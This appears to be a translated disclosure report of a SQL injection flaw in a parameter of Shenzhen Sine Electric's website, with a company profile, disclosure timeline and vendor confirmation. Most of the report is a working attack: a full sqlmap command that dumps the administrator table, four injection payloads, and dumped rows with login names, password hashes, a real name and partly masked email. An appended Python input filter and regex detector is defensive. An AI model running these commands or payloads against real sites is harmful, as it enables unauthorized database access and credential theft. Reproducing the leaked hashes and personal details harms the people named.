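2015-11-10: Details reported to the vendor; awaiting vendor handling
2015-11-11: Vendor confirmed; details disclosed to the vendor only
2015-11-21: Details disclosed to core white hats and experts in related fields
2015-12-01: Details disclosed to regular white hats
2015-12-11: Details disclosed to intern white hats
2015-12-26: Details disclosed to the public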
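Shenzhen Sine Electric Co., Ltd. (深圳市正弦电气股份有限公司) was founded in April 2003 with a registered capital of RMB 64.5 million. The company focuses on the research and development, production and sale of electric drive automation products, serving mid- to high-end equipment manufacturers and system integrators. Sine Electric is a national high-tech enterprise and a well-known Shenzhen brand. It pursues a strategy of technological leadership and product innovation, tailors dedicated products and solutions for its customers, and aims to become a leader in its market segments. The company continually improves its overall competitiveness, emphasizes in-house technical innovation, recruits and retains high-end technical talent over the long term, has introduced internationally advanced operations and R&D management processes, and applies strict quality process control. It has advanced inspection and test equipment, laboratory equipment and production equipment at scale, fully able to support the development, testing and production of low- and medium-voltage industrial control products, with an annual capacity of more than 120,000 units. Its inverters, servos, integrated controllers and other products have won repeated awards, have a good reputation in the mainland China market, and are exported to Southeast Asia, the Middle East, Russia and elsewhere. All of the company's products carry its own intellectual property rights, have been inspected and registered by national authorities, and are CE certified; its quality management system is ISO9001 certified. The company has set up 4 warehousing and logistics centers, 12 regional service centers and 19 sales offices across the country, staffed with resident sales personnel and technical service engineers, to provide customers with professional and convenient service.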
Address: http://**.**.**.**/cpzx/info_3.aspx?itemid=35&lcid=43
python sqlmap.py -u "http://**.**.**.**/cpzx/info_3.aspx?itemid=35&lcid=43" -p lcid --technique=BEQU --random-agent --batch -D sq_sinee2013hk -T Whir_Sec_Users -C LoginName,Password,UserId,Email,RealName,LastLoginIP --dump
Database: msdb
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.backupfile                                   | 70009   |

Database: master
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| sys.messages                                     | 67941   |
| sys.sysmessages                                  | 67941   |
Database: sq_sinee2013hk
Table: Whir_Sec_Users
[19 columns]
+----------------+----------+
| Column         | Type     |
+----------------+----------+
| CreateDate     | datetime |
| CreateUser     | nvarchar |
| Email          | nvarchar |
| IsDel          | bit      |
| LastLoginIP    | nvarchar |
| LastLoginTime  | datetime |
| LoginName      | nvarchar |
| LoginType      | nvarchar |
| Password       | nvarchar |
| RealName       | nvarchar |
| Remarks        | nvarchar |
| RolesId        | int      |
| Sort           | bigint   |
| State          | int      |
| SystemLanguage | int      |
| SystemSkin     | nvarchar |
| UpdateDate     | datetime |
| UpdateUser     | nvarchar |
| UserId         | int      |
+----------------+----------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: lcid (GET)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace
    Payload: itemid=35&lcid=(SELECT (CASE WHEN (8371=8371) THEN 8371 ELSE 8371*(SELECT 8371 FROM master..sysdatabases) END))

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: itemid=35&lcid=43 AND 8230=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(106)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (8230=8230) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(113)+CHAR(113)))

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: itemid=35&lcid=(SELECT CHAR(113)+CHAR(107)+CHAR(106)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (1615=1615) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(113)+CHAR(113))

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: itemid=35&lcid=43 UNION ALL SELECT CHAR(113)+CHAR(107)+CHAR(106)+CHAR(106)+CHAR(113)+CHAR(101)+CHAR(67)+CHAR(115)+CHAR(112)+CHAR(121)+CHAR(118)+CHAR(67)+CHAR(85)+CHAR(113)+CHAR(71)+CHAR(113)+CHAR(69)+CHAR(90)+CHAR(107)+CHAR(84)+CHAR(75)+CHAR(119)+CHAR(80)+CHAR(115)+CHAR(118)+CHAR(88)+CHAR(78)+CHAR(102)+CHAR(90)+CHAR(106)+CHAR(90)+CHAR(97)+CHAR(115)+CHAR(69)+CHAR(76)+CHAR(75)+CHAR(72)+CHAR(65)+CHAR(79)+CHAR(100)+CHAR(97)+CHAR(82)+CHAR(88)+CHAR(105)+CHAR(108)+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(113)+CHAR(113),NULL,NULL-- -
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005

Database: sq_sinee2013hk
Table: Whir_Sec_Users
[4 entries]
+-----------+------------------------------------------+--------+-----------------------+------------+-------------+
| LoginName | Password                                 | UserId | Email                 | RealName   | LastLoginIP |
+-----------+------------------------------------------+--------+-----------------------+------------+-------------+
| admin     | EED5873ACF981C43FE65257D87351443A50470AC | 6      | <blank>               | 超级管理员 | **.**.**.** |
| sineehr   | DEF021F935046446AE8639169852FC023440F5D9 | 7      | nieweiwei@**.**.**.** | 聂先生     | **.**.**.** |
| sineehr   | DEF021F935046446AE8639169852FC023440F5D9 | 7      | nieweiwei@**.**.**.** | 聂先生     | **.**.**.** |
| sineehr   | DEF021F935046446AE8639169852FC023440F5D9 | 7      | nieweiwei@**.**.**.** | 聂先生     | **.**.**.** |
+-----------+------------------------------------------+--------+-----------------------+------------+-------------+
Add filtering.
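An added example (not part of the original report and not the vendor's code) of the filtering this fix calls for: a strict integer allow-list check on the `itemid` and `lcid` parameters named in the report, which also labels rejected values by the payload shapes in the sqlmap output. The host name, the sample URLs and the label names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Query parameters of info_3.aspx that the report shows carrying numeric ids.
NUMERIC_PARAMS = {"itemid", "lcid"}
# Allow-list: 1-9 ASCII digits, which always fits a 32-bit SQL Server int.
INT_RE = re.compile(r"[0-9]{1,9}")

# Labels (constructed for this example) keyed to the payload shapes that the
# sqlmap output in the report lists for the lcid parameter.
SIGNATURES = [
    ("union", re.compile(r"\bUNION\s+ALL\s+SELECT\b", re.I)),
    ("error-based", re.compile(r"\bCONVERT\s*\(\s*INT\s*,", re.I)),
    ("boolean/inline", re.compile(r"\(\s*SELECT\b", re.I)),
]

def check_request(url):
    """Return (ok, findings) for one request URL.

    ok is False when any occurrence of a numeric parameter is not a plain
    integer; findings lists (parameter, label) for each rejected value.
    """
    findings = []
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    for name, value in pairs:
        name = name.lower()  # ASP.NET query-string keys are case-insensitive
        if name not in NUMERIC_PARAMS or INT_RE.fullmatch(value):
            continue
        # Every occurrence is checked: ASP.NET joins repeated keys with
        # commas, so one bad duplicate taints the value the page sees.
        label = next((lbl for lbl, rx in SIGNATURES if rx.search(value)),
                     "non-numeric")
        findings.append((name, label))
    return (not findings, findings)

# Constructed sample requests; payloads are shortened from the report's output.
BASE = "http://example.test/cpzx/info_3.aspx?itemid=35&"
SAMPLES = [
    BASE + "lcid=43",
    BASE + "lcid=43%20UNION%20ALL%20SELECT%20NULL,NULL,NULL--%20",
    BASE + "lcid=43%20AND%208230=CONVERT(INT,(SELECT%20CHAR(113)))",
    BASE + "LCID=(SELECT%20(CASE%20WHEN%20(1=1)%20THEN%201%20ELSE%200%20END))",
    BASE + "lcid=43&lcid=1%27",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(check_request(url), url)
```

On the server side the same allow-list belongs in front of a parameterized query, so that a value which passes is still bound as an integer rather than concatenated into the SQL text.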
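Severity: High
Vulnerability rank: 10
Confirmed: 2015-11-11 15:00
Thank you very much for your report. The issue in the report has been confirmed and reproduced. Affected data: high; attack cost: low; impact: high; overall rating: high, rank: 10. We are contacting the organization that manages the website to have it handled.
None yet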